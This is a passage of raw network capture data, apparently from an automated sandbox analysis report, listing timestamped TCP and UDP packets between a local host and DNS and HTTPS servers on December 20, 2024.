                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:22.999767065 CET50061443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:22.999797106 CET4435006120.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:23.000622034 CET4435006120.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:23.002366066 CET50061443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:23.002428055 CET50061443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:23.002439976 CET4435006120.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:23.003021002 CET50061443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:23.043354988 CET4435006120.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:23.559420109 CET4435006120.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:23.560448885 CET50061443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:23.560499907 CET4435006120.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:23.560551882 CET50061443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:23.560581923 CET50061443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:32.521112919 CET49924443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:32.521138906 CET44349924162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:32.521156073 CET49923443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:32.521177053 CET44349923162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:35.705946922 CET4970480192.168.2.623.193.114.26
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:35.826427937 CET804970423.193.114.26192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:35.827065945 CET4970480192.168.2.623.193.114.26
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:36.540666103 CET49969443192.168.2.6204.79.197.219
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:36.540667057 CET49970443192.168.2.6204.79.197.219
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:36.540683985 CET44349969204.79.197.219192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:36.540688038 CET44349970204.79.197.219192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:38.080498934 CET49967443192.168.2.623.44.201.38
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:38.080543995 CET49968443192.168.2.623.44.201.38
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:38.080549955 CET4434996723.44.201.38192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:38.080579996 CET4434996823.44.201.38192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:38.303925991 CET50103443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:38.303987026 CET4435010320.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:38.304158926 CET50103443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:38.304809093 CET50103443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:38.304835081 CET4435010320.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:38.412214041 CET50104443192.168.2.623.44.201.7
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:38.412273884 CET4435010423.44.201.7192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:38.412360907 CET50104443192.168.2.623.44.201.7
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:38.412607908 CET50104443192.168.2.623.44.201.7
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:38.412626982 CET4435010423.44.201.7192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:39.627804995 CET4435010423.44.201.7192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:39.628386974 CET50104443192.168.2.623.44.201.7
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:39.628451109 CET4435010423.44.201.7192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:39.629456043 CET4435010423.44.201.7192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:39.629550934 CET50104443192.168.2.623.44.201.7
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:39.629962921 CET50104443192.168.2.623.44.201.7
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:39.630037069 CET4435010423.44.201.7192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:39.683773994 CET50104443192.168.2.623.44.201.7
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:39.683820009 CET4435010423.44.201.7192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:39.731158018 CET50104443192.168.2.623.44.201.7
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:40.525682926 CET4435010320.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:40.525841951 CET50103443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:40.527568102 CET50103443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:40.527590990 CET4435010320.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:40.528407097 CET4435010320.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:40.530262947 CET50103443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:40.530322075 CET50103443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:40.530333996 CET4435010320.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:40.530466080 CET50103443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:40.575337887 CET4435010320.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:41.072483063 CET4435010320.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:41.072717905 CET4435010320.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:41.072808027 CET50103443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:41.072897911 CET50103443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:41.072937965 CET4435010320.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:58.945647955 CET4435010423.44.201.7192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:58.945743084 CET4435010423.44.201.7192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:58.945967913 CET50104443192.168.2.623.44.201.7
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:59.756938934 CET50154443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:59.756983995 CET4435015420.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:59.757112980 CET50154443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:59.757697105 CET50154443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:59.757708073 CET4435015420.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:33:01.970851898 CET4435015420.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:33:01.970953941 CET50154443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:33:01.973267078 CET50154443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:33:01.973277092 CET4435015420.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:33:01.973608971 CET4435015420.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:33:01.974805117 CET50154443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:33:01.975095987 CET50154443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:33:01.975100994 CET4435015420.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:33:01.975212097 CET50154443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:33:02.015381098 CET4435015420.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:33:02.517182112 CET4435015420.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:33:02.517610073 CET4435015420.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:33:02.517678022 CET50154443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:33:02.517719030 CET50154443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:33:02.517736912 CET4435015420.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:33:02.517775059 CET50154443192.168.2.620.198.118.190

                                                                                                                                                                                                                                                                                                UDP Packets

                                                                                                                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:30:59.028122902 CET6463553192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:30:59.165431976 CET53646351.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:01.403800964 CET4952053192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:01.722737074 CET53495201.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:17.718301058 CET5511553192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:17.718509912 CET6492153192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:17.759805918 CET53494271.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:17.855297089 CET53551151.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:17.855416059 CET53612471.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:17.856456041 CET53649211.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.648705006 CET53519991.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:21.305417061 CET53543241.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:22.448617935 CET53541121.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:24.415843010 CET5229653192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:24.416080952 CET5355453192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:24.550822973 CET53644961.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:24.553004026 CET53522961.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:24.553313017 CET53535541.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:33.178144932 CET6187853192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:33.185748100 CET5218053192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:33.325973988 CET53521801.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:36.161313057 CET6305653192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:36.161458015 CET5581353192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:36.383187056 CET5350153192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:36.383476973 CET5743053192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:36.519865036 CET53535011.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:36.521692038 CET53574301.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:37.946472883 CET5062153192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:37.946595907 CET6396153192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:37.947132111 CET5212853192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:37.947280884 CET5864153192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:37.954454899 CET6230753192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:37.954641104 CET5886853192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.083949089 CET53521281.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.084093094 CET53506211.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.084239006 CET53586411.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.084861994 CET53639611.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.091490984 CET53623071.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.091521978 CET53588681.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:39.747843027 CET61356443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.054202080 CET61356443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.655422926 CET61356443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.770867109 CET5281353192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.771015882 CET6200253192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.771898985 CET5474353192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.772078991 CET5897853192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.849952936 CET44361356172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.850066900 CET44361356172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.850115061 CET44361356172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.850131035 CET44361356172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.856595993 CET61356443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.856971025 CET61356443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.857413054 CET61356443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.864552021 CET61356443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.908162117 CET53620021.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.908430099 CET53528131.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.913300991 CET61356443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.924778938 CET61356443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.064801931 CET44361356172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.210091114 CET44361356172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.210170031 CET44361356172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.210184097 CET44361356172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.210196018 CET44361356172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.210208893 CET44361356172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.210818052 CET44361356172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.210829020 CET61356443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.211080074 CET61356443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.228343010 CET44361356172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.229082108 CET44361356172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.229269981 CET61356443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.240818977 CET44361356172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.241516113 CET44361356172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.241910934 CET44361356172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.241987944 CET44361356172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.242001057 CET44361356172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.242187023 CET44361356172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.242264986 CET44361356172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.242377996 CET61356443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.242475033 CET61356443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.242621899 CET61356443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.245810986 CET61356443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.252242088 CET61356443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.524744987 CET44361356172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.551055908 CET61356443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.560228109 CET44361356172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.561513901 CET44361356172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.567424059 CET44361356172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.567960978 CET44361356172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.568393946 CET61356443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.568438053 CET44361356172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.568546057 CET44361356172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.569611073 CET61356443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.584042072 CET61356443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.584387064 CET61356443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.585347891 CET61356443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.585526943 CET61356443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.585974932 CET61356443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.586080074 CET61356443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.899039030 CET44361356172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.900127888 CET44361356172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.901180983 CET44361356172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.901223898 CET44361356172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.901442051 CET44361356172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.901566029 CET44361356172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.901750088 CET44361356172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.901839972 CET44361356172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.902004004 CET61356443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.902091026 CET61356443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.902174950 CET61356443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:43.268605947 CET61356443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:43.269290924 CET61356443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:43.270665884 CET63530443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:43.583530903 CET44361356172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:43.583961964 CET44361356172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:43.584094048 CET44361356172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:43.584328890 CET61356443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:43.584427118 CET63530443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:43.864634037 CET61356443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:43.864748955 CET61356443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.181185007 CET44361356172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.182164907 CET44361356172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.185347080 CET63530443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.209361076 CET44361356172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.209625006 CET61356443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.354362965 CET44363530162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.354413033 CET44363530162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.354429007 CET44363530162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.354518890 CET44363530162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.355333090 CET63530443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.356462955 CET63530443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.362382889 CET63530443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.498950005 CET44363530162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.669862986 CET44363530162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.670460939 CET44363530162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.670475006 CET44363530162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.670486927 CET44363530162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.670639038 CET63530443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.670825958 CET63530443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.675425053 CET44363530162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.984339952 CET44363530162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:45.018402100 CET63530443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:45.944797039 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:45.966182947 CET61356443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:45.966300011 CET61356443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:45.969595909 CET60539443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:46.248874903 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:46.279331923 CET60539443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:46.281275034 CET44361356172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:46.290357113 CET44361356172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:46.290374994 CET44361356172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:46.290400028 CET44361356172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:46.290801048 CET61356443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:46.864589930 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:46.903486967 CET60539443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:47.029983997 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:47.044503927 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:47.044558048 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:47.044569969 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:47.044604063 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:47.044946909 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:47.046845913 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:47.046972036 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:47.047282934 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:47.047389030 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:47.047404051 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:47.047425985 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:47.062628031 CET4436053923.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:47.063482046 CET4436053923.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:47.063540936 CET4436053923.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:47.063555002 CET4436053923.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:47.063595057 CET4436053923.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:47.063803911 CET60539443192.168.2.623.209.72.43
